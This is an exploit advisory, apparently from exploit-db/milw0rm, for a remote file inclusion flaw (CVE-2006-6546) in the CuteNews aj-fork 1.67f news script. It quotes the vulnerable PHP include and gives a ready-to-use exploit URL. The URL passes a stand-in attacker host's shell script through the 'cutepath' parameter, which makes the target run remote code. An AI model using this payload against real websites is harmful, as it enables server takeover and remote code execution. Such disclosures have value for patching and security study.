Lucene search
DeltahackingTEAMEDB-ID:2891HistoryDec 04, 2006 - 12:00 a.m.
CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion
2006-12-0400:00:00
DeltahackingTEAM
www.exploit-db.com
70
AI Score
7.4
Confidence
Low
===========================================================================================================
DeltasecurityTEAM
www.Deltasecurity.ir
===========================================================================================================
* Portal Name : cutenews aj-fork
* Class = Remote File Inclusion ;
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip
* Found by = DeltahackingTEAM
* User In Delta Team (Tanha )
----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------
include($cutepath.'/inc/plugins.php');
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?
----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug
# milw0rm.com [2006-12-04]Related
cve
cve
CVE-2006-6546
2006-12-14 02:28:00
cvelist
cvelist
CVE-2006-6546
2006-12-14 02:00:00
nvd
nvd
CVE-2006-6546
2006-12-14 02:28:00